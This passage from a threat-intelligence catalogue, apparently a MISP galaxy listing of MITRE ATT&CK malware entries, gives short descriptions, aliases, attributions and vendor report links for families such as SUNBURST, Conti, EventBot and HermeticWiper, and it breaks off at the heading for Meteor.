https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html

https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data

https://www.group-ib.com/whitepapers/ransomware-uncovered.html

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/

https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware

https://www.secureworks.com/blog/revil-the-gandcrab-connection

https://www.secureworks.com/research/revil-sodinokibi-ransomware

https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis

Goopy - S0477

[Goopy](https://attack.mitre.org/software/S0477) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050) that shares several similarities with another backdoor used by the group ([Denis](https://attack.mitre.org/software/S0354)). [Goopy](https://attack.mitre.org/software/S0477) is named for its impersonation of the legitimate Google Updater executable.(Citation: Cybereason Cobalt Kitty 2017)

The tag is: misp-galaxy:mitre-malware="Goopy - S0477"

Goopy - S0477 is also known as:

  • Goopy

Table 7783. Table References

Links

https://attack.mitre.org/software/S0477

https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf

EventBot - S0478

[EventBot](https://attack.mitre.org/software/S0478) is an Android banking trojan and information stealer that abuses Android’s accessibility service to steal data from various applications.(Citation: Cybereason EventBot) [EventBot](https://attack.mitre.org/software/S0478) was designed to target over 200 different banking and financial applications, the majority of which are European bank and cryptocurrency exchange applications.(Citation: Cybereason EventBot)

The tag is: misp-galaxy:mitre-malware="EventBot - S0478"

EventBot - S0478 is also known as:

  • EventBot

Table 7784. Table References

Links

https://attack.mitre.org/software/S0478

https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born

Kessel - S0487

[Kessel](https://attack.mitre.org/software/S0487) is a backdoored build of OpenSSH that primarily steals credentials and operates as a bot. [Kessel](https://attack.mitre.org/software/S0487) has been active since at least August 2018, when its C2 domain began resolving.(Citation: ESET ForSSHe December 2018)

The tag is: misp-galaxy:mitre-malware="Kessel - S0487"

Kessel - S0487 is also known as:

  • Kessel

Table 7785. Table References

Links

https://attack.mitre.org/software/S0487

https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf

Dacls - S0497

[Dacls](https://attack.mitre.org/software/S0497) is a multi-platform remote access tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least December 2019.(Citation: TrendMicro macOS Dacls May 2020)(Citation: SentinelOne Lazarus macOS July 2020)

The tag is: misp-galaxy:mitre-malware="Dacls - S0497"

Dacls - S0497 is also known as:

  • Dacls

Table 7786. Table References

Links

https://attack.mitre.org/software/S0497

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/

https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

WolfRAT - S0489

[WolfRAT](https://attack.mitre.org/software/S0489) is malware based on a leaked version of [Dendroid](https://attack.mitre.org/software/S0301) that has primarily targeted Thai users. [WolfRAT](https://attack.mitre.org/software/S0489) has most likely been operated by the now defunct organization Wolf Research.(Citation: Talos-WolfRAT)

The tag is: misp-galaxy:mitre-malware="WolfRAT - S0489"

WolfRAT - S0489 is also known as:

  • WolfRAT

Table 7787. Table References

Links

https://attack.mitre.org/software/S0489

https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html

Cryptoistic - S0498

[Cryptoistic](https://attack.mitre.org/software/S0498) is a backdoor, written in Swift, that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032).(Citation: SentinelOne Lazarus macOS July 2020)

The tag is: misp-galaxy:mitre-malware="Cryptoistic - S0498"

Cryptoistic - S0498 is also known as:

  • Cryptoistic

Table 7788. Table References

Links

https://attack.mitre.org/software/S0498

https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

Hancitor - S0499

[Hancitor](https://attack.mitre.org/software/S0499) is a downloader that has been used by [Pony](https://attack.mitre.org/software/S0453) and other information stealing malware.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)

The tag is: misp-galaxy:mitre-malware="Hancitor - S0499"

Hancitor - S0499 is also known as:

  • Hancitor

  • Chanitor

Table 7789. Table References

Links

https://attack.mitre.org/software/S0499

https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/

https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html

CHEMISTGAMES - S0555

[CHEMISTGAMES](https://attack.mitre.org/software/S0555) is a modular backdoor that has been deployed by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CYBERWARCON CHEMISTGAMES)

The tag is: misp-galaxy:mitre-malware="CHEMISTGAMES - S0555"

CHEMISTGAMES - S0555 is also known as:

  • CHEMISTGAMES

Table 7790. Table References

Links

https://attack.mitre.org/software/S0555

https://www.youtube.com/watch?v=xoNSbm1aX_w

BusyGasper - S0655

[BusyGasper](https://attack.mitre.org/software/S0655) is Android spyware that has been in use since May 2016. Fewer than 10 victims have been identified, all apparently located in Russia and all infected via physical access to the device.(Citation: SecureList BusyGasper)

The tag is: misp-galaxy:mitre-malware="BusyGasper - S0655"

BusyGasper - S0655 is also known as:

  • BusyGasper

Table 7791. Table References

Links

https://attack.mitre.org/software/S0655

https://securelist.com/busygasper-the-unfriendly-spy/87627/

Raindrop - S0565

[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)

The tag is: misp-galaxy:mitre-malware="Raindrop - S0565"

Raindrop - S0565 is also known as:

  • Raindrop

Table 7792. Table References

Links

https://attack.mitre.org/software/S0565

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

Conti - S0575

[Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://attack.mitre.org/software/S0575) has been deployed via [TrickBot](https://attack.mitre.org/software/S0266) and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)

The tag is: misp-galaxy:mitre-malware="Conti - S0575"

Conti - S0575 is also known as:

  • Conti

Table 7793. Table References

Links

https://attack.mitre.org/software/S0575

https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/

https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/

https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware

Kerrdown - S0585

[Kerrdown](https://attack.mitre.org/software/S0585) is a custom downloader that has been used by [APT32](https://attack.mitre.org/groups/G0050) since at least 2018 to install spyware from a server on the victim’s network.(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown February 2019)

The tag is: misp-galaxy:mitre-malware="Kerrdown - S0585"

Kerrdown - S0585 is also known as:

  • Kerrdown

Table 7794. Table References

Links

https://attack.mitre.org/software/S0585

https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/

https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf

SUNBURST - S0559

[SUNBURST](https://attack.mitre.org/software/S0559) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)

The tag is: misp-galaxy:mitre-malware="SUNBURST - S0559"

SUNBURST - S0559 is also known as:

  • SUNBURST

  • Solorigate

Table 7795. Table References

Links

https://attack.mitre.org/software/S0559

https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

ThiefQuest - S0595

[ThiefQuest](https://attack.mitre.org/software/S0595) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://attack.mitre.org/software/S0595) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.(Citation: Reed thiefquest fake ransom) Even though [ThiefQuest](https://attack.mitre.org/software/S0595) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)

The tag is: misp-galaxy:mitre-malware="ThiefQuest - S0595"

ThiefQuest - S0595 is also known as:

  • ThiefQuest

  • MacRansom.K

  • EvilQuest

Table 7796. Table References

Links

https://attack.mitre.org/software/S0595

https://blog.malwarebytes.com/detections/osx-thiefquest/

https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/

https://objective-see.com/blog/blog_0x60.html

https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/

ThreatNeedle - S0665

[ThreatNeedle](https://attack.mitre.org/software/S0665) is a backdoor that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Manuscrypt (a.k.a. NukeSped) malware family.(Citation: Kaspersky ThreatNeedle Feb 2021)

The tag is: misp-galaxy:mitre-malware="ThreatNeedle - S0665"

ThreatNeedle - S0665 is also known as:

  • ThreatNeedle

Table 7797. Table References

Links

https://attack.mitre.org/software/S0665

https://securelist.com/lazarus-threatneedle/100803/

BLUELIGHT - S0657

[BLUELIGHT](https://attack.mitre.org/software/S0657) is a remote access Trojan used by [APT37](https://attack.mitre.org/groups/G0067) that was first observed in early 2021.(Citation: Volexity InkySquid BLUELIGHT August 2021)

The tag is: misp-galaxy:mitre-malware="BLUELIGHT - S0657"

BLUELIGHT - S0657 is also known as:

  • BLUELIGHT

Table 7798. Table References

Links

https://attack.mitre.org/software/S0657

https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

MegaCortex - S0576

[MegaCortex](https://attack.mitre.org/software/S0576) is ransomware that first appeared in May 2019.(Citation: IBM MegaCortex) [MegaCortex](https://attack.mitre.org/software/S0576) has mainly targeted industrial organizations.(Citation: FireEye Ransomware Disrupt Industrial Production)(Citation: FireEye Financial Actors Moving into OT)

The tag is: misp-galaxy:mitre-malware="MegaCortex - S0576"

MegaCortex - S0576 is also known as:

  • MegaCortex

Table 7799. Table References

Links

https://attack.mitre.org/software/S0576

https://securityintelligence.com/posts/from-mega-to-giga-cross-version-comparison-of-top-megacortex-modifications/

https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

Dtrack - S0567

[Dtrack](https://attack.mitre.org/software/S0567) is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. [Dtrack](https://attack.mitre.org/software/S0567) shares similarities with the DarkSeoul campaign, which was attributed to [Lazarus Group](https://attack.mitre.org/groups/G0032).(Citation: Kaspersky Dtrack)(Citation: Securelist Dtrack)(Citation: Dragos WASSONITE)(Citation: CyberBit Dtrack)(Citation: ZDNet Dtrack)

The tag is: misp-galaxy:mitre-malware="Dtrack - S0567"

Dtrack - S0567 is also known as:

  • Dtrack

Table 7800. Table References

Links

https://attack.mitre.org/software/S0567

https://securelist.com/my-name-is-dtrack/93338/

https://usa.kaspersky.com/about/press-releases/2019_dtrack-previously-unknown-spy-tool-hits-financial-institutions-and-research-centers

https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/

https://www.dragos.com/threat/wassonite/

https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/

TAINTEDSCRIBE - S0586

[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) is a fully-featured beaconing implant integrated with command modules used by [Lazarus Group](https://attack.mitre.org/groups/G0032). It was first reported in May 2020.(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020)

The tag is: misp-galaxy:mitre-malware="TAINTEDSCRIBE - S0586"

TAINTEDSCRIBE - S0586 is also known as:

  • TAINTEDSCRIBE

Table 7801. Table References

Links

https://attack.mitre.org/software/S0586

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b

XCSSET - S0658

[XCSSET](https://attack.mitre.org/software/S0658) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://attack.mitre.org/software/S0658) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.(Citation: trendmicro xcsset xcode project 2020)

The tag is: misp-galaxy:mitre-malware="XCSSET - S0658"

XCSSET - S0658 is also known as:

  • XCSSET

  • OSX.DubRobber

Table 7802. Table References

Links

https://attack.mitre.org/software/S0658

https://blog.malwarebytes.com/detections/osx-dubrobber/

https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf

EVILNUM - S0568

[EVILNUM](https://attack.mitre.org/software/S0568) is a fully featured backdoor that was first identified in 2018. [EVILNUM](https://attack.mitre.org/software/S0568) is used by the APT group of the same name, [Evilnum](https://attack.mitre.org/groups/G0120).(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)

The tag is: misp-galaxy:mitre-malware="EVILNUM - S0568"

EVILNUM - S0568 is also known as:

  • EVILNUM

Table 7803. Table References

Links

https://attack.mitre.org/software/S0568

https://www.prevailion.com/phantom-in-the-command-shell-2/

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

PowerPunch - S0685

[PowerPunch](https://attack.mitre.org/software/S0685) is a lightweight downloader that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022)

The tag is: misp-galaxy:mitre-malware="PowerPunch - S0685"

PowerPunch - S0685 is also known as:

  • PowerPunch

Table 7804. Table References

Links

https://attack.mitre.org/software/S0685

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

Diavol - S0659

[Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. [Diavol](https://attack.mitre.org/software/S0659) has been deployed by [Bazar](https://attack.mitre.org/software/S0534) and is thought to have potential ties to [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diavol Ransomware December 2021)

The tag is: misp-galaxy:mitre-malware="Diavol - S0659"

Diavol - S0659 is also known as:

  • Diavol

Table 7805. Table References

Links

https://attack.mitre.org/software/S0659

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider

https://www.ic3.gov/Media/News/2022/220120.pdf

Explosive - S0569

[Explosive](https://attack.mitre.org/software/S0569) is a custom-made remote access tool used by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123). It was first identified in the wild in 2015.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)

The tag is: misp-galaxy:mitre-malware="Explosive - S0569"

Explosive - S0569 is also known as:

  • Explosive

Table 7806. Table References

Links

https://attack.mitre.org/software/S0569

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf

https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

ShadowPad - S0596

[ShadowPad](https://attack.mitre.org/software/S0596) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://attack.mitre.org/groups/G0096), but has since been observed to be used by various Chinese threat activity groups. (Citation: Recorded Future RedEcho Feb 2021)(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017)

The tag is: misp-galaxy:mitre-malware="ShadowPad - S0596"

ShadowPad - S0596 is also known as:

  • ShadowPad

  • POISONPLUG.SHADOW

Table 7807. Table References

Links

https://attack.mitre.org/software/S0596

https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf

https://securelist.com/shadowpad-in-corporate-networks/81432/

https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf

FrozenCell - S0577

[FrozenCell](https://attack.mitre.org/software/S0577) is the mobile component of a family of surveillanceware, with a corresponding desktop component known as KasperAgent and [Micropsia](https://attack.mitre.org/software/S0339).(Citation: Lookout FrozenCell)

The tag is: misp-galaxy:mitre-malware="FrozenCell - S0577"

FrozenCell - S0577 is also known as:

  • FrozenCell

Table 7808. Table References

Links

https://attack.mitre.org/software/S0577

https://blog.lookout.com/frozencell-mobile-threat

SUPERNOVA - S0578

[SUPERNOVA](https://attack.mitre.org/software/S0578) is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of [APT29](https://attack.mitre.org/groups/G0016)'s SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests [SUPERNOVA](https://attack.mitre.org/software/S0578) may have been used by the China-based threat group SPIRAL.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)(Citation: SolarWinds Advisory Dec 2020)(Citation: CISA Supernova Jan 2021)(Citation: Microsoft Analyzing Solorigate Dec 2020)

The tag is: misp-galaxy:mitre-malware="SUPERNOVA - S0578"

SUPERNOVA - S0578 is also known as:

  • SUPERNOVA

Table 7809. Table References

Links

https://attack.mitre.org/software/S0578

https://unit42.paloaltonetworks.com/solarstorm-supernova/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a

https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

https://www.solarwinds.com/sa-overview/securityadvisory

Penquin - S0587

[Penquin](https://attack.mitre.org/software/S0587) is a remote access trojan (RAT) with multiple versions used by [Turla](https://attack.mitre.org/groups/G0010) to target Linux systems since at least 2014.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020)

The tag is: misp-galaxy:mitre-malware="Penquin - S0587"

Penquin - S0587 is also known as:

  • Penquin

  • Penquin 2.0

  • Penquin_x64

Table 7810. Table References

Links

https://attack.mitre.org/software/S0587

https://securelist.com/the-penquin-turla-2/67962/

https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf

GoldFinder - S0597

[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)

The tag is: misp-galaxy:mitre-malware="GoldFinder - S0597"

GoldFinder - S0597 is also known as:

  • GoldFinder

Table 7811. Table References

Links

https://attack.mitre.org/software/S0597

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Waterbear - S0579

[Waterbear](https://attack.mitre.org/software/S0579) is modular malware attributed to [BlackTech](https://attack.mitre.org/groups/G0098) that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.(Citation: Trend Micro Waterbear December 2019)

The tag is: misp-galaxy:mitre-malware="Waterbear - S0579"

Waterbear - S0579 is also known as:

  • Waterbear

Table 7812. Table References

Links

https://attack.mitre.org/software/S0579

https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html

GoldMax - S0588

[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)

The tag is: misp-galaxy:mitre-malware="GoldMax - S0588"

GoldMax - S0588 is also known as:

  • GoldMax

  • SUNSHUTTLE

Table 7813. Table References

Links

https://attack.mitre.org/software/S0588

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Sibot - S0589

[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024).(Citation: MSTIC NOBELIUM Mar 2021)

The tag is: misp-galaxy:mitre-malware="Sibot - S0589"

Sibot - S0589 is also known as:

  • Sibot

Table 7814. Table References

Links

https://attack.mitre.org/software/S0589

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Kinsing - S0599

[Kinsing](https://attack.mitre.org/software/S0599) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)(Citation: Aqua Security Cloud Native Threat Report June 2021)

The tag is: misp-galaxy:mitre-malware="Kinsing - S0599"

Kinsing - S0599 is also known as:

  • Kinsing

Table 7815. Table References

Links

https://attack.mitre.org/software/S0599

https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability

https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation

https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/

Gelsemium - S0666

[Gelsemium](https://attack.mitre.org/software/S0666) is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. [Gelsemium](https://attack.mitre.org/software/S0666) has been used by the Gelsemium group since at least 2014.(Citation: ESET Gelsemium June 2021)

The tag is: misp-galaxy:mitre-malware="Gelsemium - S0666"

Gelsemium - S0666 is also known as:

  • Gelsemium

  • Gelsevirine

  • Gelsenicine

  • Gelsemine

Table 7816. Table References

Links

https://attack.mitre.org/software/S0666

https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf

Chrommme - S0667

[Chrommme](https://attack.mitre.org/software/S0667) is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with [Gelsemium](https://attack.mitre.org/software/S0666) malware.(Citation: ESET Gelsemium June 2021)

The tag is: misp-galaxy:mitre-malware="Chrommme - S0667"

Chrommme - S0667 is also known as:

  • Chrommme

Table 7817. Table References

Links

https://attack.mitre.org/software/S0667

https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf

QuietSieve - S0686

[QuietSieve](https://attack.mitre.org/software/S0686) is an information stealer that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022)

The tag is: misp-galaxy:mitre-malware="QuietSieve - S0686"

QuietSieve - S0686 is also known as:

  • QuietSieve

Table 7818. Table References

Links

https://attack.mitre.org/software/S0686

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

TinyTurla - S0668

[TinyTurla](https://attack.mitre.org/software/S0668) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010) against targets in the US, Germany, and Afghanistan since at least 2020.(Citation: Talos TinyTurla September 2021)

The tag is: misp-galaxy:mitre-malware="TinyTurla - S0668"

TinyTurla - S0668 is also known as:

  • TinyTurla

Table 7819. Table References

Links

https://attack.mitre.org/software/S0668

https://blog.talosintelligence.com/2021/09/tinyturla.html

KOCTOPUS - S0669

[KOCTOPUS](https://attack.mitre.org/software/S0669)'s batch variant is a loader used by [LazyScripter](https://attack.mitre.org/groups/G0140) since 2018 to launch [Octopus](https://attack.mitre.org/software/S0340) and [Koadic](https://attack.mitre.org/software/S0250) and, in some cases, [QuasarRAT](https://attack.mitre.org/software/S0262). [KOCTOPUS](https://attack.mitre.org/software/S0669) also has a VBA variant that has the same functionality as the batch version.(Citation: MalwareBytes LazyScripter Feb 2021)

The tag is: misp-galaxy:mitre-malware="KOCTOPUS - S0669"

KOCTOPUS - S0669 is also known as:

  • KOCTOPUS

Table 7820. Table References

Links

https://attack.mitre.org/software/S0669

https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf

Flagpro - S0696

[Flagpro](https://attack.mitre.org/software/S0696) is a Windows-based, first-stage downloader that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.(Citation: NTT Security Flagpro new December 2021)

The tag is: misp-galaxy:mitre-malware="Flagpro - S0696"

Flagpro - S0696 is also known as:

  • Flagpro

Table 7821. Table References

Links

https://attack.mitre.org/software/S0696

https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech

Torisma - S0678

[Torisma](https://attack.mitre.org/software/S0678) is a second stage implant designed for specialized monitoring that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [Torisma](https://attack.mitre.org/software/S0678) was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.(Citation: McAfee Lazarus Nov 2020)

The tag is: misp-galaxy:mitre-malware="Torisma - S0678"

Torisma - S0678 is also known as:

  • Torisma

Table 7822. Table References

Links

https://attack.mitre.org/software/S0678

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/

Ferocious - S0679

[Ferocious](https://attack.mitre.org/software/S0679) is a first stage implant composed of VBS and PowerShell scripts that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021)

The tag is: misp-galaxy:mitre-malware="Ferocious - S0679"

Ferocious - S0679 is also known as:

  • Ferocious

Table 7823. Table References

Links

https://attack.mitre.org/software/S0679

https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044

HermeticWiper - S0697

[HermeticWiper](https://attack.mitre.org/software/S0697) is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Symantec Ukraine Wipers February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022)

The tag is: misp-galaxy:mitre-malware="HermeticWiper - S0697"

HermeticWiper - S0697 is also known as:

  • HermeticWiper

  • Trojan.Killdisk

  • DriveSlayer

Table 7824. Table References

Links

https://attack.mitre.org/software/S0697

https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia

https://www.cisa.gov/uscert/ncas/alerts/aa22-057a

https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/

https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine

https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack

https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine

Meteor - S0688

